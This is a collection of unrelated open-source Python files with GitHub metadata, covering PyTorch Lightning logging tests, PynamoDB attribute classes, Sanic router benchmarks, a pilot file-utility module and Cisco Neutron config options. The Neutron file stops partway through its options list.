assert set(trainer.logged_metrics) == {"epoch", "a", "b_step", "b_epoch", "c", "d_step", "d_epoch", "g"}
assert not trainer.progress_bar_metrics
    # we don't want to enable val metrics during steps, because that is not something users should do on purpose
assert set(trainer.callback_metrics) == {"a", "b", "b_epoch", "c", "d", "d_epoch", "g", "b_step"}
@pytest.mark.parametrize(["batches", "log_interval", "max_epochs"], [(1, 1, 1), (64, 32, 2)])
def test_eval_epoch_logging(tmpdir, batches, log_interval, max_epochs):
class TestModel(BoringModel):
def validation_epoch_end(self, outputs):
self.log("c", torch.tensor(2), on_epoch=True, prog_bar=True, logger=True)
self.log("d/e/f", 2)
model = TestModel()
trainer = Trainer(
default_root_dir=tmpdir,
limit_train_batches=batches,
limit_val_batches=batches,
max_epochs=max_epochs,
log_every_n_steps=log_interval,
weights_summary=None,
)
trainer.fit(model)
# assert the loggers received the expected number
logged_metrics = set(trainer.logged_metrics)
assert logged_metrics == {"c", "d/e/f", "epoch"}
pbar_metrics = set(trainer.progress_bar_metrics)
assert pbar_metrics == {"c"}
# make sure all the metrics are available for callbacks
callback_metrics = set(trainer.callback_metrics)
assert callback_metrics == (logged_metrics | pbar_metrics) - {"epoch"}
def test_eval_float_logging(tmpdir):
class TestModel(BoringModel):
def validation_step(self, batch, batch_idx):
output = self.layer(batch)
loss = self.loss(batch, output)
self.log("a", 12.0)
return {"x": loss}
model = TestModel()
trainer = Trainer(
default_root_dir=tmpdir,
limit_train_batches=2,
limit_val_batches=2,
max_epochs=1,
log_every_n_steps=1,
weights_summary=None,
)
trainer.fit(model)
assert set(trainer.logged_metrics) == {"a", "epoch"}
def test_eval_logging_auto_reduce(tmpdir):
class TestModel(BoringModel):
val_losses = []
manual_epoch_end_mean = None
def validation_step(self, batch, batch_idx):
output = self.layer(batch)
loss = self.loss(batch, output)
self.val_losses.append(loss)
self.log("val_loss", loss, on_epoch=True, on_step=True, prog_bar=True)
return {"x": loss}
def validation_epoch_end(self, outputs) -> None:
for passed_in, manually_tracked in zip(outputs, self.val_losses):
assert passed_in["x"] == manually_tracked
self.manual_epoch_end_mean = torch.stack([x["x"] for x in outputs]).mean()
model = TestModel()
trainer = Trainer(
default_root_dir=tmpdir,
limit_train_batches=3,
limit_val_batches=3,
max_epochs=1,
log_every_n_steps=1,
weights_summary=None,
num_sanity_val_steps=0,
)
trainer.fit(model)
# make sure all the metrics are available for callbacks
assert set(trainer.callback_metrics) == {"val_loss", "val_loss_epoch"}
# make sure values are correct
assert trainer.logged_metrics["val_loss_epoch"] == model.manual_epoch_end_mean
assert trainer.callback_metrics["val_loss_epoch"] == model.manual_epoch_end_mean
assert trainer.callback_metrics["val_loss"] == model.manual_epoch_end_mean
assert trainer.logged_metrics["val_loss_step"] == model.val_losses[-1]
@pytest.mark.parametrize(["batches", "log_interval", "max_epochs"], [(1, 1, 1), (64, 32, 2)])
def test_eval_epoch_only_logging(tmpdir, batches, log_interval, max_epochs):
"""
    Tests that test_epoch_end can be used to log, and that the logged values are returned in the results.
"""
class TestModel(BoringModel):
def test_epoch_end(self, outputs):
self.log("c", torch.tensor(2))
self.log("d/e/f", 2)
model = TestModel()
trainer = Trainer(
default_root_dir=tmpdir,
max_epochs=max_epochs,
limit_test_batches=batches,
log_every_n_steps=log_interval,
weights_summary=None,
)
results = trainer.test(model)
assert len(results) == 1
assert results[0] == {"c": torch.tensor(2), "d/e/f": 2}
@pytest.mark.parametrize("suffix", (False, True))
def test_multi_dataloaders_add_suffix_properly(tmpdir, suffix):
class TestModel(BoringModel):
def test_step(self, batch, batch_idx, dataloader_idx=0):
out = super().test_step(batch, batch_idx)
self.log("test_loss", out["y"], on_step=True, on_epoch=True)
return out
def test_dataloader(self):
if suffix:
return [
torch.utils.data.DataLoader(RandomDataset(32, 64)),
torch.utils.data.DataLoader(RandomDataset(32, 64)),
]
return super().test_dataloader()
model = TestModel()
model.test_epoch_end = None
trainer = Trainer(
default_root_dir=tmpdir,
limit_train_batches=0,
limit_val_batches=0,
limit_test_batches=2,
max_epochs=1,
log_every_n_steps=1,
weights_summary=None,
)
results = trainer.test(model)
for i, r in enumerate(results):
expected = {"test_loss", "test_loss_epoch"}
if suffix:
expected = {e + f"/dataloader_idx_{i}" for e in expected}
assert set(r) == expected
def test_log_works_in_val_callback(tmpdir):
"""
    Tests that log can be called within a callback
"""
class TestCallback(callbacks.Callback):
count = 0
choices = [False, True]
# used to compute expected values
logged_values = collections.defaultdict(list)
call_counter = collections.Counter()
logged_arguments = {}
def make_logging(self, pl_module, func_name, on_steps, on_epochs, prob_bars):
self.call_counter.update([func_name])
for idx, (on_step, on_epoch, prog_bar) in enumerate(itertools.product(on_steps, on_epochs, prob_bars)):
fx = f"{func_name}_{idx}"
pl_module.log(fx, self.count, on_step=on_step, on_epoch=on_epoch, prog_bar=prog_bar)
self.logged_values[fx].append(self.count)
self.logged_arguments[fx] = {"on_step": on_step, "on_epoch": on_epoch, "prog_bar": prog_bar}
self.count += 1
def on_validation_start(self, _, pl_module):
self.make_logging(
pl_module, "on_validation_start", on_steps=[False], on_epochs=[True], prob_bars=self.choices
)
def on_epoch_start(self, trainer, pl_module):
if trainer.validating:
self.make_logging(
pl_module, "on_epoch_start", on_steps=[False], on_epochs=[True], prob_bars=self.choices
)
def on_validation_epoch_start(self, _, pl_module):
self.make_logging(
pl_module, "on_validation_epoch_start", on_steps=[False], on_epochs=[True], prob_bars=self.choices
)
def on_validation_batch_end(self, _, pl_module, *__):
self.make_logging(
pl_module,
"on_validation_batch_end",
on_steps=self.choices,
on_epochs=self.choices,
prob_bars=self.choices,
)
def on_epoch_end(self, trainer, pl_module):
if trainer.validating:
self.make_logging(pl_module, "on_epoch_end", on_steps=[False], on_epochs=[True], prob_bars=self.choices)
def on_validation_epoch_end(self, _, pl_module):
self.make_logging(
pl_module, "on_validation_epoch_end", on_steps=[False], on_epochs=[True], prob_bars=self.choices
)
class TestModel(BoringModel):
def validation_step(self, batch, batch_idx):
loss = super().validation_step(batch, batch_idx)["x"]
self.log("val_loss", loss)
model = TestModel()
model.validation_epoch_end = None
cb = TestCallback()
trainer = Trainer(
default_root_dir=tmpdir,
limit_train_batches=1,
limit_val_batches=4,
num_sanity_val_steps=0,
max_epochs=1,
callbacks=[cb],
)
trainer.fit(model)
assert cb.call_counter == {
"on_validation_batch_end": 4,
"on_validation_start": 1,
"on_epoch_start": 1,
"on_validation_epoch_start": 1,
"on_validation_epoch_end": 1,
"on_epoch_end": 1,
}
def get_expected(on_epoch, values):
reduction = np.mean if on_epoch else np.max
return reduction(values)
for fx, value in trainer.callback_metrics.items():
actual = value.item()
if fx not in cb.logged_arguments:
continue
on_epoch = cb.logged_arguments[fx]["on_epoch"]
values = cb.logged_values[fx]
expected = get_expected(on_epoch, values)
assert actual == expected
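    # a logged value appears in progress_bar_metrics under this exact name
    # only when prog_bar=True and exactly one of on_step/on_epoch is set
    # (with both set, the suffixed _step/_epoch variants are displayed instead)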
for fx, attrs in cb.logged_arguments.items():
should_include = attrs["prog_bar"] and attrs["on_step"] ^ attrs["on_epoch"]
is_included = fx in trainer.progress_bar_metrics
assert is_included if should_include else not is_included
def test_log_works_in_test_callback(tmpdir):
"""
    Tests that log can be called within a callback
"""
class TestCallback(callbacks.Callback):
# helpers
count = 0
choices = [False, True]
# used to compute expected values
callback_funcs_called = collections.defaultdict(list)
funcs_called_count = collections.defaultdict(int)
funcs_attr = {}
def make_logging(self, pl_module, func_name, on_steps, on_epochs, prob_bars):
original_func_name = func_name[:]
self.funcs_called_count[original_func_name] += 1
for idx, (on_step, on_epoch, prog_bar) in enumerate(itertools.product(on_steps, on_epochs, prob_bars)):
func_name = original_func_name[:]
custom_func_name = f"{idx}_{func_name}"
pl_module.log(custom_func_name, self.count, on_step=on_step, on_epoch=on_epoch, prog_bar=prog_bar)
num_dl_ext = ""
if pl_module._current_dataloader_idx is not None:
dl_idx = pl_module._current_dataloader_idx
num_dl_ext = f"/dataloader_idx_{dl_idx}"
func_name += num_dl_ext
# catch information for verification
self.callback_funcs_called[func_name].append([self.count])
self.funcs_attr[custom_func_name + num_dl_ext] = {
"on_step": on_step,
"on_epoch": on_epoch,
"prog_bar": prog_bar,
"func_name": func_name,
}
if on_step and on_epoch:
self.funcs_attr[f"{custom_func_name}_step" + num_dl_ext] = {
"on_step": True,
"on_epoch": False,
"prog_bar": prog_bar,
"func_name": func_name,
}
self.funcs_attr[f"{custom_func_name}_epoch" + num_dl_ext] = {
"on_step": False,
"on_epoch": True,
"prog_bar": prog_bar,
"func_name": func_name,
}
def on_test_start(self, _, pl_module):
self.make_logging(pl_module, "on_test_start", on_steps=[False], on_epochs=[True], prob_bars=self.choices)
def on_test_epoch_start(self, _, pl_module):
self.make_logging(
pl_module, "on_test_epoch_start", on_steps=[False], on_epochs=[True], prob_bars=self.choices
)
def on_test_batch_end(self, _, pl_module, *__):
self.make_logging(
pl_module, "on_test_batch_end", on_steps=self.choices, on_epochs=self.choices, prob_bars=self.choices
)
def on_test_epoch_end(self, _, pl_module):
self.make_logging(
pl_module, "on_test_epoch_end", on_steps=[False], on_epochs=[True], prob_bars=self.choices
)
num_dataloaders = 2
class TestModel(BoringModel):
seen_losses = {i: [] for i in range(num_dataloaders)}
def test_step(self, batch, batch_idx, dataloader_idx=None):
loss = super().test_step(batch, batch_idx)["y"]
self.log("test_loss", loss)
self.seen_losses[dataloader_idx].append(loss)
def test_dataloader(self):
return [torch.utils.data.DataLoader(RandomDataset(32, 64)) for _ in range(num_dataloaders)]
model = TestModel()
model.test_epoch_end = None
cb = TestCallback()
trainer = Trainer(
default_root_dir=tmpdir, limit_test_batches=2, num_sanity_val_steps=0, max_epochs=2, callbacks=[cb]
)
trainer.test(model)
assert cb.funcs_called_count["on_test_start"] == 1
assert cb.funcs_called_count["on_test_epoch_start"] == 1
assert cb.funcs_called_count["on_test_batch_end"] == 4
assert cb.funcs_called_count["on_test_epoch_end"] == 1
callback_metrics_keys = list(trainer.callback_metrics)
for func_name in cb.callback_funcs_called.keys():
is_in = False
for callback_metrics_key in callback_metrics_keys:
if func_name in callback_metrics_key:
is_in = True
assert is_in, (func_name, callback_metrics_keys)
def get_expected(on_epoch, values):
reduction = np.mean if on_epoch else np.max
return reduction(values)
# Make sure the func_name output equals the average from all logged values when on_epoch true
for dl_idx in range(num_dataloaders):
key = f"test_loss/dataloader_idx_{dl_idx}"
assert key in trainer.callback_metrics
assert torch.stack(model.seen_losses[dl_idx]).mean() == trainer.callback_metrics.pop(key)
for func_name, output_value in trainer.callback_metrics.items():
output_value = output_value.item()
func_attr = cb.funcs_attr[func_name]
original_values = cb.callback_funcs_called[func_attr["func_name"]]
expected_output = get_expected(func_attr["on_epoch"], original_values)
assert output_value == expected_output
for fx, attrs in cb.funcs_attr.items():
should_include = attrs["prog_bar"] and attrs["on_step"] ^ attrs["on_epoch"]
is_included = fx in trainer.progress_bar_metrics
assert is_included if should_include else not is_included
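# Taken together, the assertions above pin down three contracts of self.log()
# in the test loop: every logged key must surface in trainer.callback_metrics,
# on_epoch=True values must reduce to the mean of the per-step values, and
# only entries logged with prog_bar=True and exactly one of on_step/on_epoch
# set may reach trainer.progress_bar_metrics.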
@mock.patch("pytorch_lightning.loggers.TensorBoardLogger.log_metrics")
def test_validation_step_log_with_tensorboard(mock_log_metrics, tmpdir):
"""
    This test makes sure we properly call log_metrics on the loggers
"""
class ExtendedModel(BoringModel):
val_losses = []
def training_step(self, batch, batch_idx):
output = self.layer(batch)
loss = self.loss(batch, output)
self.log("train_loss", loss)
return {"loss": loss}
def validation_step(self, batch, batch_idx):
output = self.layer(batch)
loss = self.loss(batch, output)
self.val_losses.append(loss)
self.log("valid_loss_0", loss, on_step=True, on_epoch=True)
self.log("valid_loss_1", loss, on_step=False, on_epoch=True)
self.log("valid_loss_2", loss, on_step=True, on_epoch=False)
self.log("valid_loss_3", loss, on_step=False, on_epoch=False)
return {"val_loss": loss} # not added to callback_metrics
def test_step(self, batch, batch_idx):
output = self.layer(batch)
loss = self.loss(batch, output)
self.log("test_loss", loss)
return {"y": loss}
model = ExtendedModel()
model.validation_epoch_end = None
# Initialize a trainer
trainer = Trainer(
default_root_dir=tmpdir,
logger=TensorBoardLogger(tmpdir),
limit_train_batches=2,
limit_val_batches=2,
limit_test_batches=2,
max_epochs=2,
progress_bar_refresh_rate=1,
)
# Train the model ⚡
trainer.fit(model)
# hp_metric + 2 steps + epoch + 2 steps + epoch
expected_num_calls = 1 + 2 + 1 + 2 + 1
assert len(mock_log_metrics.mock_calls) == expected_num_calls
assert mock_log_metrics.mock_calls[0] == call({"hp_metric": -1}, 0)
def get_metrics_at_idx(idx):
mock_calls = list(mock_log_metrics.mock_calls)
if isinstance(mock_calls[idx].kwargs, dict):
return mock_calls[idx].kwargs["metrics"]
return mock_calls[idx][2]["metrics"]
expected = {"valid_loss_0_step", "valid_loss_2"}
assert set(get_metrics_at_idx(1)) == expected
assert set(get_metrics_at_idx(2)) == expected
assert get_metrics_at_idx(1)["valid_loss_0_step"] == model.val_losses[2]
assert get_metrics_at_idx(2)["valid_loss_0_step"] == model.val_losses[3]
assert set(get_metrics_at_idx(3)) == {"valid_loss_0_epoch", "valid_loss_1", "epoch"}
assert get_metrics_at_idx(3)["valid_loss_1"] == torch.stack(model.val_losses[2:4]).mean()
expected = {"valid_loss_0_step", "valid_loss_2"}
assert set(get_metrics_at_idx(4)) == expected
assert set(get_metrics_at_idx(5)) == expected
assert get_metrics_at_idx(4)["valid_loss_0_step"] == model.val_losses[4]
assert get_metrics_at_idx(5)["valid_loss_0_step"] == model.val_losses[5]
assert set(get_metrics_at_idx(6)) == {"valid_loss_0_epoch", "valid_loss_1", "epoch"}
assert get_metrics_at_idx(6)["valid_loss_1"] == torch.stack(model.val_losses[4:]).mean()
results = trainer.test(model)
assert set(trainer.callback_metrics) == {
"train_loss",
"valid_loss_0_epoch",
"valid_loss_0",
"valid_loss_1",
"test_loss",
}
assert set(results[0]) == {"test_loss"}
def test_logging_dict_on_validation_step(tmpdir):
class TestModel(BoringModel):
def validation_step(self, batch, batch_idx):
loss = super().validation_step(batch, batch_idx)
loss = loss["x"]
metrics = {
"loss": loss,
"loss_1": loss,
}
self.log("val_metrics", metrics)
validation_epoch_end = None
model = TestModel()
trainer = Trainer(
default_root_dir=tmpdir,
limit_train_batches=2,
limit_val_batches=2,
max_epochs=2,
progress_bar_refresh_rate=1,
)
trainer.fit(model)
|
{
"content_hash": "e5379a7796d33cef10b883c791117efa",
"timestamp": "",
"source": "github",
"line_count": 605,
"max_line_length": 120,
"avg_line_length": 35.30413223140496,
"alnum_prop": 0.5890725221218222,
"repo_name": "williamFalcon/pytorch-lightning",
"id": "8579bc044734a7807994f94fdf820a8aa36cb5f2",
"size": "21947",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/trainer/logging_/test_eval_loop_logging.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "511511"
},
{
"name": "Shell",
"bytes": "1731"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from frappe.desk.page.setup_wizard.install_fixtures import setup_email_linking
def execute():
setup_email_linking()
|
{
"content_hash": "9f90c001b9f23b69a5532406c9d6bec6",
"timestamp": "",
"source": "github",
"line_count": 6,
"max_line_length": 78,
"avg_line_length": 26.333333333333332,
"alnum_prop": 0.7911392405063291,
"repo_name": "adityahase/frappe",
"id": "08f57ca5e4a987afec6108b913358b289270ef62",
"size": "158",
"binary": false,
"copies": "3",
"ref": "refs/heads/develop",
"path": "frappe/patches/v12_0/setup_email_linking.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "288806"
},
{
"name": "HTML",
"bytes": "209164"
},
{
"name": "JavaScript",
"bytes": "2350450"
},
{
"name": "Less",
"bytes": "160693"
},
{
"name": "Makefile",
"bytes": "99"
},
{
"name": "Python",
"bytes": "3035663"
},
{
"name": "SCSS",
"bytes": "45340"
},
{
"name": "Shell",
"bytes": "517"
},
{
"name": "Vue",
"bytes": "73943"
}
],
"symlink_target": ""
}
|
"""
PynamoDB attributes
"""
import six
import json
from base64 import b64encode, b64decode
from delorean import Delorean, parse
from pynamodb.constants import (
STRING, NUMBER, BINARY, UTC, DATETIME_FORMAT, BINARY_SET, STRING_SET, NUMBER_SET,
DEFAULT_ENCODING
)
class Attribute(object):
"""
An attribute of a model
"""
attr_name = None
def __init__(self,
attr_type=str,
hash_key=False,
range_key=False,
null=False,
default=None,
attr_name=None
):
self.value = None
self.default = default
self.null = null
self.attr_type = attr_type
self.is_hash_key = hash_key
self.is_range_key = range_key
if attr_name is not None:
self.attr_name = attr_name
def __set__(self, instance, value):
if isinstance(value, Attribute):
return self
if instance:
instance.attribute_values[self.attr_name] = value
self.value = value
def __get__(self, instance, owner):
if instance:
return instance.attribute_values.get(self.attr_name, None)
else:
return self
def serialize(self, value):
"""
This method should return a dynamodb compatible value
"""
return value
def deserialize(self, value):
"""
Performs any needed deserialization on the value
"""
return value
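# Minimal illustration of the descriptor protocol above (FakeModel is a
# hypothetical stand-in; real models come from pynamodb.models):
#     class FakeModel(object):
#         attribute_values = {}
#         name = UnicodeAttribute(attr_name='name')
#     m = FakeModel()
#     m.name = 'foo'          # __set__ stores into instance.attribute_values
#     assert m.name == 'foo'  # __get__ reads it back from the same dict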
class SetMixin(object):
"""
Adds (de)serialization methods
"""
def serialize(self, value):
"""
Serializes a set
Because dynamodb doesn't store empty attributes,
empty sets return None
"""
if value and len(value):
return [val for val in sorted(value)]
else:
return None
def deserialize(self, value):
"""
Deserializes a set
"""
if value and len(value):
return set([val for val in value])
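# Note the asymmetry above: because DynamoDB cannot store empty attributes,
# an empty set serializes to None, and deserializing an empty value likewise
# yields None rather than set(). For example:
#     SetMixin().serialize(set())   # -> None
#     SetMixin().serialize({2, 1})  # -> [1, 2]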
class BinaryAttribute(Attribute):
"""
A binary attribute
"""
def __init__(self, **kwargs):
kwargs.setdefault('attr_type', BINARY)
super(BinaryAttribute, self).__init__(**kwargs)
def serialize(self, value):
"""
Returns a base64 encoded binary string
"""
return b64encode(value).decode(DEFAULT_ENCODING)
def deserialize(self, value):
"""
Returns a decoded string from base64
"""
return b64decode(value.encode(DEFAULT_ENCODING))
class BinarySetAttribute(SetMixin, Attribute):
"""
A binary set
"""
def __init__(self, **kwargs):
kwargs.setdefault('attr_type', BINARY_SET)
kwargs.setdefault('null', True)
super(BinarySetAttribute, self).__init__(**kwargs)
def serialize(self, value):
"""
Returns a base64 encoded binary string
"""
if value and len(value):
return [b64encode(val).decode(DEFAULT_ENCODING) for val in sorted(value)]
else:
return None
def deserialize(self, value):
"""
Returns a decoded string from base64
"""
if value and len(value):
return set([b64decode(val.encode(DEFAULT_ENCODING)) for val in value])
class UnicodeSetAttribute(SetMixin, Attribute):
"""
A unicode set
"""
def __init__(self, **kwargs):
kwargs.setdefault('attr_type', STRING_SET)
kwargs.setdefault('null', True)
super(UnicodeSetAttribute, self).__init__(**kwargs)
class UnicodeAttribute(Attribute):
"""
A unicode attribute
"""
def __init__(self, **kwargs):
kwargs.setdefault('attr_type', STRING)
super(UnicodeAttribute, self).__init__(**kwargs)
def serialize(self, value):
"""
Returns a unicode string
"""
if value is None or not len(value):
return None
elif isinstance(value, six.text_type):
return value
else:
return six.u(value)
class JSONAttribute(Attribute):
"""
A JSON Attribute
Encodes JSON to unicode internally
"""
def __init__(self, **kwargs):
kwargs.setdefault('attr_type', STRING)
super(JSONAttribute, self).__init__(**kwargs)
def serialize(self, value):
"""
Serializes JSON to unicode
"""
if value is None:
return None
encoded = json.dumps(value)
return six.u(encoded)
def deserialize(self, value):
"""
Deserializes JSON
"""
return json.loads(value)
class BooleanAttribute(Attribute):
"""
A class for boolean attributes
This attribute type uses a number attribute to save space
"""
def __init__(self, **kwargs):
kwargs.setdefault('attr_type', NUMBER)
super(BooleanAttribute, self).__init__(**kwargs)
def serialize(self, value):
"""
Encodes True as 1, False as 0
"""
if value is None:
return None
elif value:
return json.dumps(1)
else:
return json.dumps(0)
def deserialize(self, value):
"""
        Decodes the stored 0/1 value back to a boolean
"""
return bool(json.loads(value))
class NumberSetAttribute(SetMixin, Attribute):
"""
A number set attribute
"""
def __init__(self, **kwargs):
kwargs.setdefault('attr_type', NUMBER_SET)
kwargs.setdefault('null', True)
super(NumberSetAttribute, self).__init__(**kwargs)
class NumberAttribute(Attribute):
"""
A number attribute
"""
def __init__(self, **kwargs):
kwargs.setdefault('attr_type', NUMBER)
super(NumberAttribute, self).__init__(**kwargs)
def serialize(self, value):
"""
Encode numbers as JSON
"""
return json.dumps(value)
def deserialize(self, value):
"""
Decode numbers from JSON
"""
return json.loads(value)
class UTCDateTimeAttribute(Attribute):
"""
An attribute for storing a UTC Datetime
"""
def __init__(self, **kwargs):
kwargs.setdefault('attr_type', STRING)
super(UTCDateTimeAttribute, self).__init__(**kwargs)
def serialize(self, value):
"""
Takes a datetime object and returns a string
"""
fmt = Delorean(value, timezone=UTC).datetime.strftime(DATETIME_FORMAT)
return six.u(fmt)
def deserialize(self, value):
"""
Takes a UTC datetime string and returns a datetime object
"""
return parse(value).datetime
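# A short round-trip sketch of the attribute types above (values chosen
# purely for illustration):
#     num = NumberAttribute()
#     assert num.deserialize(num.serialize(42)) == 42
#     flag = BooleanAttribute()
#     assert flag.serialize(True) == '1' and flag.deserialize('1') is True
#     blob = BinaryAttribute()
#     assert blob.deserialize(blob.serialize(b'raw')) == b'raw'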
|
{
"content_hash": "e9efd7b17e587e85973a23c315ad1f26",
"timestamp": "",
"source": "github",
"line_count": 268,
"max_line_length": 85,
"avg_line_length": 24.91417910447761,
"alnum_prop": 0.5650741350906096,
"repo_name": "mtsgrd/PynamoDB2",
"id": "7b31c41a8283b2f781a2a8a7ef510c6329ffbe34",
"size": "6677",
"binary": false,
"copies": "1",
"ref": "refs/heads/devel",
"path": "pynamodb/attributes.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "265307"
}
],
"symlink_target": ""
}
|
from random import choice, seed
from pytest import mark
import sanic.router
from sanic.request import Request
seed("Pack my box with five dozen liquor jugs.")
# Disable caching for testing purposes
sanic.router.ROUTER_CACHE_SIZE = 0
class TestSanicRouteResolution:
@mark.asyncio
async def test_resolve_route_no_arg_string_path(
self, sanic_router, route_generator, benchmark
):
simple_routes = route_generator.generate_random_direct_route(
max_route_depth=4
)
router, simple_routes = sanic_router(route_details=simple_routes)
route_to_call = choice(simple_routes)
request = Request(
"/{}".format(route_to_call[-1]).encode(),
{"host": "localhost"},
"v1",
route_to_call[0],
None,
None,
)
result = benchmark.pedantic(
router.get,
(
request.path,
request.method,
request.headers.get("host"),
),
iterations=1000,
rounds=1000,
)
assert await result[1](None) == 1
@mark.asyncio
async def test_resolve_route_with_typed_args(
self, sanic_router, route_generator, benchmark
):
typed_routes = route_generator.add_typed_parameters(
route_generator.generate_random_direct_route(max_route_depth=4),
max_route_depth=8,
)
router, typed_routes = sanic_router(route_details=typed_routes)
route_to_call = choice(typed_routes)
url = route_generator.generate_url_for_template(
template=route_to_call[-1]
)
print("{} -> {}".format(route_to_call[-1], url))
request = Request(
"/{}".format(url).encode(),
{"host": "localhost"},
"v1",
route_to_call[0],
None,
None,
)
result = benchmark.pedantic(
router.get,
(
request.path,
request.method,
request.headers.get("host"),
),
iterations=1000,
rounds=1000,
)
assert await result[1](None) == 1
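# Note on the benchmark calls above: benchmark.pedantic() times router.get
# over rounds x iterations invocations with the given positional args and
# returns the final call's return value, which is why each test can assert
# against the resolved route in `result` after the timing run.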
|
{
"content_hash": "1eb7f4966abc7601c30187b20fdbd328",
"timestamp": "",
"source": "github",
"line_count": 81,
"max_line_length": 76,
"avg_line_length": 27.65432098765432,
"alnum_prop": 0.5334821428571429,
"repo_name": "ashleysommer/sanic",
"id": "a921d06306a1352d1a600a4088670f739d13960d",
"size": "2240",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/benchmark/test_route_resolution_benchmark.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "159"
},
{
"name": "Go",
"bytes": "482"
},
{
"name": "HTML",
"bytes": "1173"
},
{
"name": "Makefile",
"bytes": "2412"
},
{
"name": "Python",
"bytes": "962491"
}
],
"symlink_target": ""
}
|
import os
import time
import json
from pUtil import tolog, convert
def openFile(filename, mode):
""" Open and return a file pointer for the given mode """
# Note: caller needs to close the file
f = None
if os.path.exists(filename):
try:
f = open(filename, mode)
except IOError, e:
tolog("!!WARNING!!2997!! Caught exception: %s" % (e))
else:
tolog("!!WARNING!!2998!! File does not exist: %s" % (filename))
return f
def getJSONDictionary(filename):
""" Open json file and return its dictionary """
d = None
f = openFile(filename, 'r')
if f:
try:
d = json.load(f)
except Exception, e:
tolog("!!WARNING!!2222!! Failed to load json dictionary: %s" % (e))
else:
f.close()
# Try to convert the dictionary from unicode to utf-8
if d != {}:
try:
d = convert(d)
except Exception, e:
tolog("!!WARNING!!2996!! Failed to convert dictionary from unicode to utf-8: %s, %s" % (d, e))
else:
tolog("!!WARNING!!2995!! Load function returned empty JSON dictionary: %s" % (filename))
return d
def findLatestTRFLogFile(workdir):
""" Find out which is the latest log.* file """
last_log_file = ""
# Assume the log files begin with 'log.'
pattern = "log."
file_list = sortedLs(workdir, pattern)
if file_list != []:
last_log_file = os.path.join(workdir, file_list[-1])
tolog("Found payload log files: %s" % str(file_list))
tolog("File %s was the last log file that was updated" % (last_log_file))
else:
tolog("Did not find any log.* files")
return last_log_file
def sortedLs(path, pattern):
""" Sort the contents of directory 'path' using 'pattern' """
# Note: pattern is only a string, e.g. pattern = 'log.' will return a
# list with all files starting with 'log.' in time order
mtime = lambda f: os.stat(os.path.join(path, f)).st_mtime
file_list = []
try:
file_list = list(sorted(os.listdir(path), key=mtime))
except Exception, e:
tolog("!!WARNING!!3232!! Failed to obtain sorted file list: %s" % (e))
final_file_list = []
if file_list != []:
for f in file_list:
if f.startswith(pattern):
final_file_list.append(f)
return final_file_list
def readFile(filename):
""" Read the contents of a file """
contents = ""
if os.path.exists(filename):
try:
f = open(filename, 'r')
except IOError, e:
tolog("!!WARNING!!2121!! Failed to open file %s: %s" % (filename, e))
else:
try:
contents = f.read()
except Exception, e:
tolog("!!WARNING!!2122!! Failed to read file %s: %s" % (filename, e))
f.close()
else:
tolog("!!WARNING!!2121!! File does not exist: %s" % (filename))
return contents
def writeFile(filename, contents):
""" Write the contents to filename """
status = False
try:
f = open(filename, 'w')
except IOError, e:
tolog("!!WARNING!!2123!! Failed to open file %s: %s" % (filename, e))
else:
try:
f.write(contents)
except IOError, e:
tolog("!!WARNING!!2123!! Failed to write to file %s: %s" % (filename, e))
else:
status = True
f.close()
return status
def tail(f, lines=10):
""" Get the n last lines from file f """
if lines == 0:
return ""
BUFSIZ = 1024
f.seek(0, 2)
bytes = f.tell()
size = lines + 1
block = -1
data = []
while size > 0 and bytes > 0:
if bytes - BUFSIZ > 0:
# Seek back one whole BUFSIZ
f.seek(block * BUFSIZ, 2)
# read BUFFER
data.insert(0, f.read(BUFSIZ))
else:
            # file too small, start from the beginning
f.seek(0,0)
# only read what was not read
data.insert(0, f.read(bytes))
linesFound = data[0].count('\n')
size -= linesFound
bytes -= BUFSIZ
block -= 1
tail_list = ''.join(data).splitlines()[-lines:]
return '\n'.join(tail_list)
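# Example usage (path is a placeholder): log the last five lines of a file
# f = openFile('/path/to/some.log', 'r')
# if f:
#     tolog(tail(f, lines=5))
#     f.close()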
# print findLatestTRFLogFile(os.getcwd())
|
{
"content_hash": "180207a51d24940f3b564107fed21859",
"timestamp": "",
"source": "github",
"line_count": 152,
"max_line_length": 114,
"avg_line_length": 28.75,
"alnum_prop": 0.5405034324942791,
"repo_name": "RRCKI/pilot",
"id": "221133a8d3f442666c8c8851324ccaf18082047c",
"size": "4430",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "FileHandling.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "4096349"
},
{
"name": "Shell",
"bytes": "23530"
}
],
"symlink_target": ""
}
|
from oslo.config import cfg
from neutron.agent.common import config
cisco_opts = [
cfg.StrOpt('vlan_name_prefix', default='q-',
help=_("VLAN Name prefix")),
cfg.StrOpt('provider_vlan_name_prefix', default='p-',
help=_("VLAN Name prefix for provider vlans")),
cfg.BoolOpt('provider_vlan_auto_create', default=True,
help=_('Provider VLANs are automatically created as needed '
'on the Nexus switch')),
cfg.BoolOpt('provider_vlan_auto_trunk', default=True,
help=_('Provider VLANs are automatically trunked as needed '
'on the ports of the Nexus switch')),
cfg.BoolOpt('nexus_l3_enable', default=False,
help=_("Enable L3 support on the Nexus switches")),
cfg.BoolOpt('svi_round_robin', default=False,
help=_("Distribute SVI interfaces over all switches")),
cfg.StrOpt('model_class',
default='neutron.plugins.cisco.models.virt_phy_sw_v2.'
'VirtualPhysicalSwitchModelV2',
help=_("Model Class")),
]
cisco_n1k_opts = [
cfg.StrOpt('integration_bridge', default='br-int',
help=_("N1K Integration Bridge")),
cfg.BoolOpt('enable_tunneling', default=True,
help=_("N1K Enable Tunneling")),
cfg.StrOpt('tunnel_bridge', default='br-tun',
help=_("N1K Tunnel Bridge")),
cfg.StrOpt('local_ip', default='10.0.0.3',
help=_("N1K Local IP")),
cfg.StrOpt('tenant_network_type', default='local',
help=_("N1K Tenant Network Type")),
cfg.StrOpt('bridge_mappings', default='',
help=_("N1K Bridge Mappings")),
cfg.StrOpt('vxlan_id_ranges', default='5000:10000',
help=_("N1K VXLAN ID Ranges")),
cfg.StrOpt('network_vlan_ranges', default='vlan:1:4095',
help=_("N1K Network VLAN Ranges")),
